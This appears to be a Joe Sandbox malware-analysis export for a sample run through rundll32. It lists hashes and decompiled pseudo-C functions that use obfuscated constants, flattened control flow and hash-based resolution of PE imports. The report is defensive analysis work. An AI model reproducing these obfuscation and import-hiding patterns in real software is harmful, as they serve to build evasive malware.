                                                                                                                                    0x002d0d8a
                                                                                                                                    0x002d0d95
                                                                                                                                    0x002d0d97
                                                                                                                                    0x002d0d31
                                                                                                                                    0x002d0d41
                                                                                                                                    0x002d0d45
                                                                                                                                    0x002d0d4a
                                                                                                                                    0x002d0d51
                                                                                                                                    0x002d0dab
                                                                                                                                    0x002d0d53
                                                                                                                                    0x002d0d58
                                                                                                                                    0x002d0d6a
                                                                                                                                    0x002d0d82
                                                                                                                                    0x002d0d87
                                                                                                                                    0x00000000
                                                                                                                                    0x002d0d87
                                                                                                                                    0x002d0d51
                                                                                                                                    0x002d0d2f
                                                                                                                                    0x002d0daa

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 1$
                                                                                                                                    • API String ID: 0-209397207
                                                                                                                                    • Opcode ID: 53f76613a298a67dc4215c9c6cba5cd064306c0e0a31594934c5ac8062f00761
                                                                                                                                    • Instruction ID: 25ca407e728ac29cb6b112961ed4613027cd15039af28f4b64502a538aaaaf9b
                                                                                                                                    • Opcode Fuzzy Hash: 53f76613a298a67dc4215c9c6cba5cd064306c0e0a31594934c5ac8062f00761
                                                                                                                                    • Instruction Fuzzy Hash: 7B612FB25083419FC394CF21D48940BBBF2FBC9768F509A1EF19696260D7B1DA5ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CAEFB Relevance: 2.6, Strings: 2, Instructions: 141COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E002CAEFB(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t116;
				void* _t130;
				intOrPtr _t133;
				void* _t137;
				intOrPtr* _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				void* _t162;

				_t135 = _a12;
				_push(_a16);
				_t154 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t116);
				_v44 = 0xe8605f;
				_t162 = _t161 + 0x18;
				_v44 = _v44 + 0x84a0;
				_v44 = _v44 ^ 0x00e8e4ff;
				_t155 = 0;
				_v68 = 0xe00e28;
				_t137 = 0xc99b7e9;
				_v68 = _v68 << 9;
				_v68 = _v68 << 2;
				_t156 = 0x3b;
				_v68 = _v68 / _t156;
				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x2e3dfc; // 0x0
								E002DE274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E002DAE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                                    0x002caeff
                                                                                                                                    0x002caf06
                                                                                                                                    0x002caf0a
                                                                                                                                    0x002caf0c
                                                                                                                                    0x002caf0d
                                                                                                                                    0x002caf11
                                                                                                                                    0x002caf15
                                                                                                                                    0x002caf16
                                                                                                                                    0x002caf17
                                                                                                                                    0x002caf1c
                                                                                                                                    0x002caf24
                                                                                                                                    0x002caf27
                                                                                                                                    0x002caf31
                                                                                                                                    0x002caf39
                                                                                                                                    0x002caf3b
                                                                                                                                    0x002caf43
                                                                                                                                    0x002caf48
                                                                                                                                    0x002caf4d
                                                                                                                                    0x002caf58
                                                                                                                                    0x002caf5d
                                                                                                                                    0x002caf63
                                                                                                                                    0x002caf6b
                                                                                                                                    0x002caf73
                                                                                                                                    0x002caf7d
                                                                                                                                    0x002caf80
                                                                                                                                    0x002caf84
                                                                                                                                    0x002caf8c
                                                                                                                                    0x002caf94
                                                                                                                                    0x002cafa4
                                                                                                                                    0x002cafad
                                                                                                                                    0x002cafb0
                                                                                                                                    0x002cafb4
                                                                                                                                    0x002cafbc
                                                                                                                                    0x002cafc4
                                                                                                                                    0x002cafc9
                                                                                                                                    0x002cafd9
                                                                                                                                    0x002cafdd
                                                                                                                                    0x002cafe5
                                                                                                                                    0x002cafed
                                                                                                                                    0x002caff5
                                                                                                                                    0x002caffe
                                                                                                                                    0x002cb001
                                                                                                                                    0x002cb005
                                                                                                                                    0x002cb00d
                                                                                                                                    0x002cb015
                                                                                                                                    0x002cb01d
                                                                                                                                    0x002cb025
                                                                                                                                    0x002cb02d
                                                                                                                                    0x002cb035
                                                                                                                                    0x002cb03a
                                                                                                                                    0x002cb042
                                                                                                                                    0x002cb04a
                                                                                                                                    0x002cb054
                                                                                                                                    0x002cb058
                                                                                                                                    0x002cb060
                                                                                                                                    0x002cb06d
                                                                                                                                    0x002cb071
                                                                                                                                    0x002cb076
                                                                                                                                    0x002cb083
                                                                                                                                    0x002cb08b
                                                                                                                                    0x002cb093
                                                                                                                                    0x002cb09b
                                                                                                                                    0x002cb09b
                                                                                                                                    0x002cb0a5
                                                                                                                                    0x002cb101
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb0a7
                                                                                                                                    0x002cb0ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb0b3
                                                                                                                                    0x002cb0bc
                                                                                                                                    0x002cb0e3
                                                                                                                                    0x002cb0f4
                                                                                                                                    0x002cb0f4
                                                                                                                                    0x002cb0ad
                                                                                                                                    0x002cb0f8
                                                                                                                                    0x002cb100
                                                                                                                                    0x002cb100
                                                                                                                                    0x002cb105
                                                                                                                                    0x002cb11b
                                                                                                                                    0x002cb120
                                                                                                                                    0x002cb125
                                                                                                                                    0x002cb131
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb127
                                                                                                                                    0x002cb127
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb127
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb136
                                                                                                                                    0x002cb136
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #@Z$_`
                                                                                                                                    • API String ID: 0-2586238014
                                                                                                                                    • Opcode ID: dc12990c7b0bbce177bc8a674bcde518299997b4f0205c1736a791a1d458d691
                                                                                                                                    • Instruction ID: 266766b340b840c726be438e4a6ce3f27451e5e1a97463a6bfc091ea3dec1d1e
                                                                                                                                    • Opcode Fuzzy Hash: dc12990c7b0bbce177bc8a674bcde518299997b4f0205c1736a791a1d458d691
                                                                                                                                    • Instruction Fuzzy Hash: 825136725083409FC718CF62C88A81BBBE1FBD8758F549A1DF59696260C3B2CA59CF47
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CDFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002CDFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x2e3e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E002C46BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E002C81B7, _v28);
							_t135 =  *0x2e3e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E002C7AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x2e3e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E002C7FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x2e3e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                                    0x002cdff3
                                                                                                                                    0x002cdff6
                                                                                                                                    0x002ce000
                                                                                                                                    0x002ce008
                                                                                                                                    0x002ce010
                                                                                                                                    0x002ce018
                                                                                                                                    0x002ce020
                                                                                                                                    0x002ce028
                                                                                                                                    0x002ce030
                                                                                                                                    0x002ce038
                                                                                                                                    0x002ce049
                                                                                                                                    0x002ce052
                                                                                                                                    0x002ce05a
                                                                                                                                    0x002ce05c
                                                                                                                                    0x002ce069
                                                                                                                                    0x002ce076
                                                                                                                                    0x002ce07b
                                                                                                                                    0x002ce083
                                                                                                                                    0x002ce092
                                                                                                                                    0x002ce095
                                                                                                                                    0x002ce099
                                                                                                                                    0x002ce0a1
                                                                                                                                    0x002ce0a9
                                                                                                                                    0x002ce0b1
                                                                                                                                    0x002ce0b9
                                                                                                                                    0x002ce0c1
                                                                                                                                    0x002ce0d1
                                                                                                                                    0x002ce0d5
                                                                                                                                    0x002ce0da
                                                                                                                                    0x002ce0e2
                                                                                                                                    0x002ce0ea
                                                                                                                                    0x002ce0f6
                                                                                                                                    0x002ce0f9
                                                                                                                                    0x002ce0fd
                                                                                                                                    0x002ce105
                                                                                                                                    0x002ce10d
                                                                                                                                    0x002ce112
                                                                                                                                    0x002ce11a
                                                                                                                                    0x002ce122
                                                                                                                                    0x002ce12a
                                                                                                                                    0x002ce132
                                                                                                                                    0x002ce137
                                                                                                                                    0x002ce13f
                                                                                                                                    0x002ce147
                                                                                                                                    0x002ce14f
                                                                                                                                    0x002ce154
                                                                                                                                    0x002ce15c
                                                                                                                                    0x002ce164
                                                                                                                                    0x002ce16e
                                                                                                                                    0x002ce177
                                                                                                                                    0x002ce17b
                                                                                                                                    0x002ce183
                                                                                                                                    0x002ce18b
                                                                                                                                    0x002ce195
                                                                                                                                    0x002ce199
                                                                                                                                    0x002ce1a1
                                                                                                                                    0x002ce1a7
                                                                                                                                    0x002ce1a7
                                                                                                                                    0x002ce1ad
                                                                                                                                    0x002ce229
                                                                                                                                    0x002ce22e
                                                                                                                                    0x002ce237
                                                                                                                                    0x002ce1af
                                                                                                                                    0x002ce1b1
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce1b3
                                                                                                                                    0x002ce1c6
                                                                                                                                    0x002ce1cb
                                                                                                                                    0x002ce1d1
                                                                                                                                    0x002ce1d4
                                                                                                                                    0x002ce1d6
                                                                                                                                    0x00000000
                                                                                                                                    0x002ce1d6
                                                                                                                                    0x002ce1b1
                                                                                                                                    0x002ce23b
                                                                                                                                    0x002ce248
                                                                                                                                    0x002ce248
                                                                                                                                    0x002ce1e7
                                                                                                                                    0x002ce1e8
                                                                                                                                    0x002ce1eb
                                                                                                                                    0x002ce1f3
                                                                                                                                    0x002ce1f5
                                                                                                                                    0x002ce1f7
                                                                                                                                    0x002ce1fd
                                                                                                                                    0x002ce1fd
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (F$"
                                                                                                                                    • API String ID: 0-1034852068
                                                                                                                                    • Opcode ID: 649c8d2b9135fe45b1aba88badc9279e6e23b8f4d5228251c541b79d12d8f20c
                                                                                                                                    • Instruction ID: 76b526ec1360ce41e9e264649e876e7f58e6bdf987eb0bd194010b31e63e9d06
                                                                                                                                    • Opcode Fuzzy Hash: 649c8d2b9135fe45b1aba88badc9279e6e23b8f4d5228251c541b79d12d8f20c
                                                                                                                                    • Instruction Fuzzy Hash: 045154714093019FC348CF25D98A90FBBE1EBC4758F148A1DF599AA260D3B1DA19CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C7C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002C7C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E002DCADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E002C6CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                                    0x002c7c3c
                                                                                                                                    0x002c7c42
                                                                                                                                    0x002c7c43
                                                                                                                                    0x002c7c47
                                                                                                                                    0x002c7c4b
                                                                                                                                    0x002c7c4c
                                                                                                                                    0x002c7c4d
                                                                                                                                    0x002c7c52
                                                                                                                                    0x002c7c5a
                                                                                                                                    0x002c7c5d
                                                                                                                                    0x002c7c6e
                                                                                                                                    0x002c7c71
                                                                                                                                    0x002c7c75
                                                                                                                                    0x002c7c7d
                                                                                                                                    0x002c7c8d
                                                                                                                                    0x002c7c91
                                                                                                                                    0x002c7c99
                                                                                                                                    0x002c7ca1
                                                                                                                                    0x002c7ca9
                                                                                                                                    0x002c7cb1
                                                                                                                                    0x002c7cb9
                                                                                                                                    0x002c7cc1
                                                                                                                                    0x002c7ccd
                                                                                                                                    0x002c7cd0
                                                                                                                                    0x002c7cd4
                                                                                                                                    0x002c7ce1
                                                                                                                                    0x002c7ce5
                                                                                                                                    0x002c7ced
                                                                                                                                    0x002c7cf5
                                                                                                                                    0x002c7cfa
                                                                                                                                    0x002c7d02
                                                                                                                                    0x002c7d0a
                                                                                                                                    0x002c7d12
                                                                                                                                    0x002c7d17
                                                                                                                                    0x002c7d1f
                                                                                                                                    0x002c7d27
                                                                                                                                    0x002c7d31
                                                                                                                                    0x002c7d35
                                                                                                                                    0x002c7d3d
                                                                                                                                    0x002c7d4a
                                                                                                                                    0x002c7d4e
                                                                                                                                    0x002c7d56
                                                                                                                                    0x002c7d5b
                                                                                                                                    0x002c7d66
                                                                                                                                    0x002c7d6a
                                                                                                                                    0x002c7d6c
                                                                                                                                    0x002c7d72
                                                                                                                                    0x002c7df1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7d7b
                                                                                                                                    0x002c7d7b
                                                                                                                                    0x002c7dea
                                                                                                                                    0x002c7dea
                                                                                                                                    0x002c7def
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7d96
                                                                                                                                    0x002c7d98
                                                                                                                                    0x002c7d9c
                                                                                                                                    0x002c7d9e
                                                                                                                                    0x002c7dfc
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dfc
                                                                                                                                    0x002c7da5
                                                                                                                                    0x002c7da7
                                                                                                                                    0x002c7de1
                                                                                                                                    0x002c7de1
                                                                                                                                    0x002c7de3
                                                                                                                                    0x002c7de5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dab
                                                                                                                                    0x002c7db5
                                                                                                                                    0x002c7db5
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dc9
                                                                                                                                    0x002c7dce
                                                                                                                                    0x002c7dd1
                                                                                                                                    0x002c7dd3
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dd5
                                                                                                                                    0x002c7dd5
                                                                                                                                    0x002c7dd9
                                                                                                                                    0x002c7ddc
                                                                                                                                    0x002c7dde
                                                                                                                                    0x002c7dde
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dde
                                                                                                                                    0x002c7dd3
                                                                                                                                    0x002c7de7
                                                                                                                                    0x002c7de7
                                                                                                                                    0x002c7de7
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dea

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: X^wE$c`
                                                                                                                                    • API String ID: 0-1321574684
                                                                                                                                    • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                    • Instruction ID: a48b16e5880782392270548733fc9990385cba582d6fac447b63a22f7d923f48
                                                                                                                                    • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                    • Instruction Fuzzy Hash: 9E5184715083429FC718DF24D886A2BBBE1FFC4398F10891DF48696221E3B1DA58CF96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C4C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                    			E002C4C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
